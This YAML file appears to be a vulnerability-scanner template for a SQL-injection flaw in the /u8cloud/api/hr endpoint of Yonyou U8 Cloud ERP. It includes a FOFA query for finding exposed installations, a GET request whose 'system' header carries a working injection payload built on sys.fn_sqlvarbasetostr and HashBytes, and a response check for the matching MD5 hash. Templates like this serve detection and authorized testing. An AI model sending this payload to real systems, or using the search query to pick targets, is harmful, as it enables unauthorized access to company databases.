product: 用友U8-Cloud
vName: 用友U8 Cloud api/hr接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。用友U8-Cloud
  api/hr接口存在SQL注入漏洞。
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
protocol: http
link: https://mp.weixin.qq.com/s/4kIbcP-MjxXUSsmNJEKh_g
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /u8cloud/api/hr
      header:
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        system: -1' or 1=sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))--+
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and